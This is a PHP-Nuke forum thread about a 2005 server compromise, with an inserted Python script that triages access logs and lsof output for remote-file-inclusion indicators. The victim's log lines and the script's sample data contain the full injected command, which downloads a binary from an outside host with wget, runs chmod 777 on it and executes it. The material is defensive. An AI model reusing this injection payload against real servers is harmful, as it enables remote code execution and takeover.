Nuke Cops :: View topic - Hacked - info for you
kalbaz
Nuke Cadet
Joined: Jun 22, 2005
Posts: 1

Posted: Wed Jun 22, 2005 6:34 am

Today I was hacked using an offsite admin.php hack. I'm running phpnuke 7.4 with no security patches etc. Yes, I know it's my fault I haven't been updating, and as of now I've shut down my site. I'm supplying information on the hacker, the method and the reasons I was hacked to you for your information.

Woke up today to find my server sending masses of spam, mostly to mtv.com.br and yahoo.com.br addresses. Immediately killed sendmail and cleared the entire queue (29,000 emails deferred).

Grabbed from apache logs:

200.149.111.241 - - [22/Jun/2005:12:52:55 +1000] "GET modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.panic0.oi.com.br/cmd.gif?&cmd=id HTTP/1.1" 200 8998
200.149.111.241 - - [22/Jun/2005:12:54:10 +1000] "GET modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.panic0.oi.com.br/cmd.gif?&cmd=wget HTTP/1.1" 200 9042
200.149.111.241 - - [22/Jun/2005:12:54:23 +1000] "GET modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.panic0.oi.com.br/cmd.gif?&cmd=cd%20/var/tmp;wget%20http://msn1.mvhosted.com/newbash;chmod%20777%20newbash;./newbash HTTP/1.1" 200 9137

Seems my netstat was corrupted at some point; I get seg faults on that. Or I have a RAM issue. So using lsof I managed to find these:

3 1888 root cwd DIR 3,1 4096 2 /
3 1888 root rtd DIR 3,1 4096 2 /
3 1888 root txt REG 3,1 652620 197633 /tmp/sh-A4IJCIAAB05 (deleted)
3 1888 root mem REG 3,1 103044 272658 /lib/ld-2.3.2.so
3 1888 root mem REG 3,1 91604 272673 /lib/libnsl-2.3.2.so
3 1888 root mem REG 3,1 23668 272667 /lib/libcrypt-2.3.2.so
3 1888 root mem REG 3,1 12696 272695 /lib/libutil-2.3.2.so
3 1888 root mem REG 3,1 1531064 320771 /lib/tls/libc-2.3.2.so
3 1888 root 0u CHR 1,3 33858 /dev/null
3 1888 root 1u CHR 1,3 33858 /dev/null
3 1888 root 2u CHR 1,3 33858 /dev/null
3 1888 root 3u IPv4 2448 TCP *:tproxy (LISTEN)


newbash 10159 apache cwd DIR 3,1 4096 2 /
newbash 10159 apache rtd DIR 3,1 4096 2 /
newbash 10159 apache txt REG 3,1 16840 293170 /var/tmp/newbash (deleted)
newbash 10159 apache mem REG 3,1 103044 272658 /lib/ld-2.3.2.so
newbash 10159 apache mem REG 3,1 1531064 320771 /lib/tls/libc-2.3.2.so
newbash 10159 apache 0u CHR 1,3 33858 /dev/null
newbash 10159 apache 1u CHR 1,3 33858 /dev/null
newbash 10159 apache 2u CHR 1,3 33858 /dev/null
newbash 10159 apache 3u IPv4 12288 TCP *:http (LISTEN)
newbash 10159 apache 4r FIFO 0,5 12292 pipe
newbash 10159 apache 5w FIFO 0,5 12292 pipe
newbash 10159 apache 6w REG 3,1 34449 147571 /var/log/httpd/error_log
newbash 10159 apache 7w REG 3,1 256045 147573 /var/log/httpd/access_log
newbash 10159 apache 8u sock 0,0 376083 can't identify protocol
newbash 10159 apache 9u unix 0xcd502580 378968 socket
newbash 10159 apache 10u IPv4 378983 TCP *:6697 (LISTEN)

So he had dumped some kind of proxy on my box as well as an apache replacement. Killed the processes, and of course the files used are gone. Looked through the nuke db and it doesn't seem like any users were created at all; he just seemed to use this exploit to dump the files and run them on my nix box.

Not sure I'll bring up my site again after this. I'll read through the various threads and security docs here and decide what to do.
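The two artifacts kalbaz posted (the access-log requests and the lsof listing) are exactly what a defender has to triage after an incident like this. The following script, added here as an example and not part of the original thread or of PHP-Nuke/phpBB, parses constructed sample data shaped like those artifacts: it flags requests whose query string carries a remote URL in a parameter (the remote-file-inclusion indicator, here `phpbb_root_path`) or shell metacharacters, and flags processes in an `lsof` listing that run from an unlinked executable or listen on ports outside an assumed allow-list. The hosts, addresses and the `EXPECTED_LISTEN_PORTS` set are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Apache common log format, shaped like
# the requests in the post but using documentation-reserved addresses/hosts.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [22/Jun/2005:12:52:55 +1000] "GET /modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://attacker.example/cmd.gif?&cmd=id HTTP/1.1" 200 8998
203.0.113.5 - - [22/Jun/2005:12:54:23 +1000] "GET /modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://attacker.example/cmd.gif?&cmd=cd%20/var/tmp;wget%20http://files.example/newbash;chmod%20777%20newbash;./newbash HTTP/1.1" 200 9137
198.51.100.7 - - [22/Jun/2005:13:01:02 +1000] "GET /modules/Forums/viewtopic.php?t=42 HTTP/1.1" 200 15321
198.51.100.7 - - [22/Jun/2005:13:02:10 +1000] "GET /modules.php?name=Forums&file=index HTTP/1.1" 200 12011
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Shell separators and download/permission tools inside a parameter value.
SHELL_META = re.compile(r"[;|`]|\$\(|\b(wget|curl|chmod)\b")


def parse_query(query):
    """Split a query string on '&' only and percent-decode keys and values.

    Written by hand instead of urllib.parse.parse_qs so that ';' inside a
    value is never treated as a pair separator (older Pythons do that).
    """
    pairs = []
    for part in query.split("&"):
        key, _, value = part.partition("=")
        pairs.append((unquote(key), unquote(value)))
    return pairs


def find_rfi_requests(log_text):
    """One finding per request whose query carries a remote URL in a parameter
    (the classic remote-file-inclusion indicator) or shell metacharacters."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "?" not in m.group("target"):
            continue
        path, _, query = m.group("target").partition("?")
        params = parse_query(query)
        remote = {k: v for k, v in params if v.lower().startswith(REMOTE_SCHEMES)}
        shell = {k: v for k, v in params if SHELL_META.search(v)}
        if remote or shell:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
                             "status": m.group("status"),
                             "remote_params": remote, "shell_params": shell})
    return findings


# Constructed lsof -n -P style listing shaped like the one in the post: a normal
# web-server worker, processes running from unlinked binaries, and listeners.
SAMPLE_LSOF = """\
COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF   NODE NAME
httpd     1002  apache txt  REG  3,1    345612   12345 /usr/sbin/httpd
httpd     1002  apache 3u   IPv4 4000            TCP *:80 (LISTEN)
newbash   10159 apache txt  REG  3,1    16840   293170 /var/tmp/newbash (deleted)
newbash   10159 apache 10u  IPv4 378983          TCP *:6697 (LISTEN)
3         1888  root   txt  REG  3,1    652620  197633 /tmp/sh-A4IJCIAAB05 (deleted)
3         1888  root   3u   IPv4 2448            TCP *:8081 (LISTEN)
"""

LISTEN_RE = re.compile(r"\b(TCP|UDP) (\S+):(\S+) \(LISTEN\)")
# Assumption for this host: only the web server's own ports should be listening.
EXPECTED_LISTEN_PORTS = {"80", "443"}


def triage_lsof(lsof_text):
    """Flag processes whose executable was unlinked after start (a common sign
    of a dropped-and-deleted payload) and listeners on unexpected ports.

    Returns a list of (pid, command, user, reason) tuples."""
    flags = []
    for line in lsof_text.splitlines()[1:]:        # skip the header row
        cols = line.split(None, 4)
        if len(cols) < 5:
            continue
        cmd, pid, user, fd, rest = cols
        if fd == "txt" and rest.endswith("(deleted)"):
            flags.append((int(pid), cmd, user,
                          "running from unlinked executable " + rest.split()[-2]))
        lm = LISTEN_RE.search(rest)
        if lm and lm.group(3) not in EXPECTED_LISTEN_PORTS:
            flags.append((int(pid), cmd, user,
                          f"unexpected {lm.group(1)} listener on {lm.group(2)}:{lm.group(3)}"))
    return flags


if __name__ == "__main__":
    for f in find_rfi_requests(SAMPLE_ACCESS_LOG):
        print("RFI?", f["ts"], f["ip"], f["path"], f["remote_params"], f["shell_params"])
    for pid, cmd, user, reason in triage_lsof(SAMPLE_LSOF):
        print("PROC", pid, cmd, user, reason)
```

Run it against a real `access_log` and the output of `lsof -n -P` to get the same two views: the remote-URL check catches the inclusion attempt even when the injected command is something innocuous like `id`, and the lsof check surfaces the symptom kalbaz saw (`(deleted)` executables that still hold a listening socket) independent of whether the process name looks legitimate.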
Evaders99
Site Admin
Joined: Aug 17, 2003
Posts: 12397

Posted: Wed Jun 22, 2005 8:06 am

Looks like what they were doing was through the Forums itself. phpBB versions less than 2.0.15 are vulnerable.

Hope you get things running again

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::